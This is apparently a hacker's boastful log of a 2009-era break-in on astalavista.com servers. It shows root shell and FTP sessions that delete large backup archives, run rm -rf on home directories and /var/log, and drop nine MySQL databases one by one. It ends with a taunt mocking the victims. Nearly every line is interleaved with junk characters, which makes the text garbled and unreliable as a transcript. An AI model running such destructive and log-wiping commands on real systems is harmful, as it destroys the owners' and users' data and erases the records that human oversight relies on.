4 A3 U B; D3 C- h$ x-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar c) b% U- Q7 R/ A
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2) F g4 I9 r- Z$ l9 \5 k
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
& g# n* w0 y) M. w: {$ m K-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
! V) y8 I* s' S1 A, o* J; F-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
# {/ R, Y0 F* p) P[snip]2 S/ }. o. q6 `, X
226 Transfer complete.
% P1 c) i9 Z% Zftp> mdelete *& B7 h& U& e. o3 U
ftp> ls -la& `' o1 Z0 D9 [: C0 c
227 Entering Passive Mode (212,254,194,163,2,193)
: A4 |9 R% L: a4 x' h6 x150 Opening BINARY mode data connection for ‘file list’.7 n( K. a8 T+ H) J. j9 M9 {$ z
226 Transfer complete.$ R! v* {6 q/ O4 ^5 l& U, B
ftp>
* o6 u H( b( w) y2 D, ]# K$ P" W4 q7 C6 O
sh-3.2# cd /home
$ a; z4 a# ^5 B# V4 A' k* x6 Y( ]( ssh-3.2# ls -la c) L# z# D9 E) Q8 I( H
total 120
* B# a3 A6 s1 V8 U1 Idrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
6 r" v4 G4 {+ ~% ~drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
5 B3 n5 V9 f! Sdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin' A1 o) _+ f! C9 i: J1 q: \& M- E& y
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
! J3 g! L4 n1 P3 R: b-rw——- 1 root root 8192 Jun 3 02:45 aquota.user$ |3 s" L# `4 a* ^' a/ W
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
# j- Z# u# M6 g) f. Idrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
& ^) n" O+ n/ x! @3 Z7 Z' W Cdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161/ d" w3 Y, Z' F4 i Z* e- k/ l2 ^
drwx–x–x 10 com com 4096 Apr 28 12:40 com* H# h: P' x. k4 u+ p
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
. }$ U" z- q! a+ P [$ q/ M: Idrwx—— 3 jon jon 4096 Sep 21 2007 jon8 g2 S+ r& `# x# V9 M
drwx—— 2 root root 16384 Sep 11 2007 lost+found
' I! Y4 `# p, C: _ @drwxr-xr-x 2 root root 4096 Sep 14 2007 my8 M: Y7 E! i7 S. v
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
6 U2 m& O& o* A0 M0 Bdrwx—— 2 jon jon 4096 Sep 15 2007 test7 B V, E1 L& M& l; Q
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
& m6 j1 a" X' Q( n; }7 Q3 L/ R4 ?" w! N5 P" E2 ?2 s, D" |
sh-3.2# rm -rf backup/
+ a" ]# w& N. x) w* z1 dsh-3.2# rm -rf backup.14161/: b, {' H Q/ y" j$ L
sh-3.2# rm -rf ftp/4 r+ K5 r0 H& @* ^, b( m
sh-3.2# rm -rf jon/
$ l% p! [. |/ ash-3.2# rm -rf my/
- Z( A }. i) Z, S1 T2 Csh-3.2# rm -rf mysqldata/- b& x+ D) a) Y/ l
sh-3.2# rm -rf test/
" {( \8 E5 v9 P" ^( B9 {1 ^+ Nsh-3.2# rm -rf tmp/' E! d; V: k; s/ Q2 {1 G
sh-3.2# cd ~
5 Z1 q. F& G% ^/ _# j, R; ^* a4 C* Gsh-3.2# rm -rf * J$ {0 P, L* ^. {
sh-3.2# rm -rf /var/log/& q9 w+ Q% _4 }+ U
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
0 X2 ~' J$ S: t) X# Nsh-3.2# rm -rf /home/*! l/ p u, a/ g" d/ y
sh-3.2# mysql
, [7 O2 \' Q x" QWelcome to the MySQL monitor. Commands end with ; or \g./ h$ E' g0 S( ~9 h
Your MySQL connection id is 407156
# f, N( s( j1 _( PServer version: 5.0.45-community-log MySQL Community Edition (GPL)
4 r! c: O7 z. t
# c0 p; m" s+ r) \# iType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( m+ I) Y+ ^* j( A2 m2 ]( R% R. |
8 M9 N4 U8 b% V# o( L+ E7 m
mysql> show databases; J: b$ a o |0 @$ r5 _# S& N9 v
+———————–+
6 b% J* z# X8 R& r| Database |& b: V, x5 s& L6 F; B
+———————–+
C, i% H) s- x| information_schema |
8 }+ g+ u# Q4 R' ?| astanet_ads |; }/ _) ]2 @7 \: E" Z: `' m" B
| astanet_mailing_lists |
: R a$ h/ Z Y6 r. n% W$ f& E' e| astanet_mediawiki |2 N7 q; @1 U. i0 R4 I! `: L
| astanet_membersystem |
9 ]; _3 {9 E; d# O| com_contrexx |; M* ~. {5 X" l; e8 x3 U# ^* @
| com_contrexx2 |
' U, v% U5 U( B3 l2 `" ^8 {| com_contrexx2_live |- l8 m$ S7 e. r( s, d
| da_roundcube |
2 N% Q& E- v4 ]5 J' E; C" ?| dolphin |% ?/ a" N; a/ R" e8 u( j1 e7 A& W
| ideapool |
- G9 t' j. p5 ^: m' L8 L| mysql |
2 @& T2 U9 J: o4 G| test |
) t; n" i2 E$ U* J# p5 @+ B% G) K| yourmaster |9 ]; @0 C5 M. P5 y' z; p7 }
+———————–+; N5 c) h) {$ y; p! s
14 rows in set (0.03 sec)
$ l8 f8 o9 C- c I, l1 b. P9 }" _, n) {% y0 z7 l; c
mysql> drop database astanet_membersystem;
, P# h% W: R% r4 A- Q" Y2 \droQuery OK, 46 rows affected (0.81 sec)" | u/ `6 I6 t- M* D0 I. c
. r) e; H; k1 L; @3 r# W. {
mysql> drop database com_contrexx;& ~# O( C) g3 X1 f& y( J) i
Query OK, 211 rows affected (2.72 sec)
7 f: }+ b$ ~( g6 N
# ~- Q8 {+ ?* kmysql> drop database com_contrexx2;$ u2 C" H/ [( b) x/ p4 e. z
Query OK, 237 rows affected (2.23 sec)
+ S' v- W# n9 j* J: F" e: ~6 \4 |- r7 P1 ~% V( f" m/ A% |
mysql> drop database com_contrexx2_live;
4 i: u g8 s& D9 q4 ]. _Query OK, 227 rows affected (7.63 sec)
" q8 h7 U: [# r# x; s) x" O9 J) O+ F$ M( |; q
mysql> drop database ideapool;
) t# c: Q& J( m, x, `) }Query OK, 69 rows affected (0.19 sec)1 h/ C9 ~7 \0 E
* i/ C# X5 Q/ A2 g. x7 zmysql> drop database yourmaster;+ N' c7 }( q* Q- D7 o, Q
Query OK, 158 rows affected (0.55 sec)- ~2 U& V' e6 g
a; s& @. o' b' ]5 {3 @
mysql> drop database astanet_ads;
3 _( h8 K$ b# @: j$ x( zQuery OK, 9 rows affected (0.11 sec)
% u- h# R+ {/ w0 U9 J5 J8 X3 j( C
i! k0 b: u4 ?* c4 @7 ymysql> drop database astanet_mailing_lists;# B" N7 D' N6 G) g: r& I
Query OK, 24 rows affected (1.47 sec)
: W/ p6 I7 a- C7 c
+ p& W1 Z& A1 \% [" R( Gmysql> drop database astanet_mediawiki;
s6 c, _5 G9 \3 h. NQuery OK, 31 rows affected (0.51 sec)
( L$ Y1 l2 l8 b3 ~, ~
5 w( v6 p+ x; ]4 T# smysql> show databases;
; W& B0 Y Z( O5 A6 ]+——————–+
" W. |5 i% h' L4 R: x5 U" d| Database |
/ \( ?+ }; q9 T1 t7 k3 z; e) |; m+——————–+
9 C( |- P9 T9 [2 i, N* z| information_schema |
) N# C2 ?2 T/ z) x, p6 T) {| da_roundcube |
& i" Y/ N5 Z/ H2 {5 j| dolphin |4 k* m% C/ _6 i1 n" h/ t0 C
| mysql |% `" K7 z! V. f% i" C" P
| test |
9 [. L, P+ ` P. ^+——————–+
8 Q# ~3 O0 c- l: r! D) a5 rows in set (0.00 sec); F% ?6 J8 ?- M# p A
4 S; d/ X- l0 n) V7 r$ J1 ?( ?2 @$ c
What a journey! We’re not sure exactly why the “Terminator” had any influence on
( V: q9 ~/ H, [2 |1 _their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
/ L4 z5 }$ J4 s1 Cwrong to say this pack of morons *wont be back*.! P" m6 P- d4 d4 f6 s
|